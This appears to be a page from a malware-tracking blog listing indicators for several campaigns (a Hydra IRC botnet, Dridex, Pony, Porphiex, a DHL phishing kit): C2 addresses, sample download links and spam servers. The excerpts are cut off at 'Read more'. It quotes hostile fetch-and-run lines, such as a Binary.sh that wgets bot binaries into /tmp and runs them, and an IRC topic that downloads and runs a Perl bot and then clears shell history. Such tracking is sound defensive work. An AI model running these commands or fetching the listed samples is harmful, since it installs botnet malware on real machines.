Resolved : [ poweroftech.com ] To [ 193.0.200.89 ] Panel here : hxxp://poweroftech.com/poweroftech.com/soul/ Sample here : hxxp://www.gramer.pro/get/run.exe Other samples : hxxp://www.gramer.pro/get/ Diferent folders : hxxp://poweroftech.com/ Loader.bat : hxp://poweroftech.com/sin/ or direct link : hxxp://poweroftech.com/sin/loader.bat Hosting Infos : http://whois.domaintools.com/193.0.200.89
Hydra Botnet (Hosted In France Paris Hexatom)
Around 100 hydra bots inside. Server : 149.91.89.253:6667 Channel : #perls Url’s : hxxp://208.67.1.142/ddos.pl hxxp://208.67.1.142/hack/ u can get the rest of files here Binary.sh : cd /tmp && wget -q hxxp://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel cd /tmp && wget -q hxxp://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips cd /tmp && wget -q hxxp://208.67.1.142/hack/telsh4 &&Read more...
Trojan.GenericKD.3018192 (Hosted In Germany Falkenstein Hetzner Online Gmbh)
Email Spam via these smtp servers : “cdptpa-pub-iedge-vip.email.rr.com” “smtp.orange.fr” “smtp.sina.com” “smtp.googlemail.com” “smtp.tiscali.co.uk” “out.alice.it” Servers used to spam : “173.194.195.16:25” “78.47.198.134:80” “62.24.139.11:25” “107.14.166.70:25” “193.252.22.86:25” “82.57.200.132:25” “202.108.6.242:25” Downloaded files : “GET /libeay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent: Mozilla/4.0 (compatible; Synapse)” “GET /ssleay32.dll HTTP/1.0 Host: 78.47.198.134 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6 User-Agent:Read more...
Worm Porphiex
Domains used by the worm : “tuhocphp.net” “milomaine.org” “milwaukeearmedforcesweek.org” “millplainlibrary.org” “mimemoria.org” “militarytrial.org” “milesbuckinghamlaw.org” “millcreek-construction.org” “milpitasvoter.org” “milkingshadows.org” “millionairemakers.org” “millgroup.org” “mimedrive.org” “millriverwatershed.org” “minaple.org” “millercountyga.org” “milwaukeelandmarks.org” “milyonbabies.org” “military-law.org” “mindfullife.org” Servers used by the worm : “220.181.87.80:5050” “112.78.4.160:80” “213.186.33.5:25” “82.165.73.126:25” “199.34.228.68:25” “81.169.145.84:25” “184.168.221.20:25” “82.165.100.254:25” “92.61.157.100:25” “184.168.221.53:25” “173.255.220.88:25” “82.165.100.228:25” “184.168.221.76:25” “198.11.204.78:25” “143.95.43.78:25” “104.25.88.29:25” “74.208.60.100:25” “66.39.35.237:25” “50.63.202.34:25” “50.63.202.18:25” Downloaded files :Read more...
62.76.191.108(Dridex Downloader Hosted In Russian Federation Saint Petersburg It House Ltd)
Url’s : hxxp://www.mraguas.com/43543r34r/843tf.exe hxxp://clothesmaxusa.com/43543r34r/843tf.exe hxxp://69.61.48.46/43543r34r/843tf.exe Contact Server : 62.76.191.108:1743 Hosting Infos : http://whois.domaintools.com/62.76.191.108
comment.dyn.mk(Linux Irc Bots Hosted In Korea, Republic Of Seoul Sk Broadband Co Ltd)
Resolved : [ comment.dyn.mk ] To [ 1.234.46.241 ] maybe hacked machine. $server = ‘comment.dyn.mk’ unless $server; my $port = ‘6667’; [11:00] * Now talking in #kill (around 100 bots inside) [11:00] * Topic is ‘wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c ‘ [11:00] * Set by anonplus on Thu Jan 07 17:06:34 URead more...
munachim.linkpc.net(Trojan-Spy.Win32.Recam.yyy Hosted In Canada Vankleek Hill Maxx Ltd.)
Resolved : [ munachim.linkpc.net ] To [ 67.215.4.74 ] Contacted Hosts : hxxp://workshopnw.ddns.net hxxp://67.215.4.74 hxxp://serialcheck55.serveblog.net hxxp://gbuzue.ddns.net:288 hxxp://sedon1.ddns.net Sample here : hxxp://clintonllc.com/swift.scr Hosting Infos : http://whois.domaintools.com/67.215.4.74
DHL Phishing Script (Hosted In United States Provo Websitewelcome.com)
Resolved : [ rentmyryde.com ] To [ 192.232.247.118 ] Principal page : hxxp://rentmyryde.com/css/DHL/DHL/tracking.php DHL.zip here : hxxp://rentmyryde.com/css/ Lamers behind the script : Created BY Mr-Anobs/Modified By Realone Hosting Infos : http://whois.domaintools.com/192.232.247.118
inmrvogurin.ru(Pony Hosted In Macao Macau Alan Hqservers Web Studio)
This guy keep changing domainnames but he uses the same shit. Resolved : [ inmrvogurin.ru ] To [ 163.53.247.144 ] URL’S : hxxp://inmrvogurin.ru/SY/test/gate.php hxxp://inmrvogurin.ru/SY/test/admin.php TF leters in red maybe a tribute to trojanforge. Sample here : hxxp://inmrvogurin.ru/SY/test/micro.exe Hosting Infos : http://whois.domaintools.com/163.53.247.144
proexti.ufam.edu.br(Trojan.Win32.Generic Hosted In Brazil Manaus Associacao Rede Nacional De Ensino E Pesquisa)
This is the downloader : hxxp://www.xup.in/dl,79161341/010-RELATORIOFINAL_2601.doc.exe.7z/ Domain used to donwload the trojan : hellolink.biz 110.4.45.31 URL : hxxp://hellolink.biz/pinjam.my/counter/WinProc.zip unzip the file the trojan exe is inside. Trojan is packed with Themida and gets file from here : proexti.ufam.edu.br/xmlrpc/content/count/B/fix.php Hosting Infos : http://whois.domaintools.com/200.129.163.16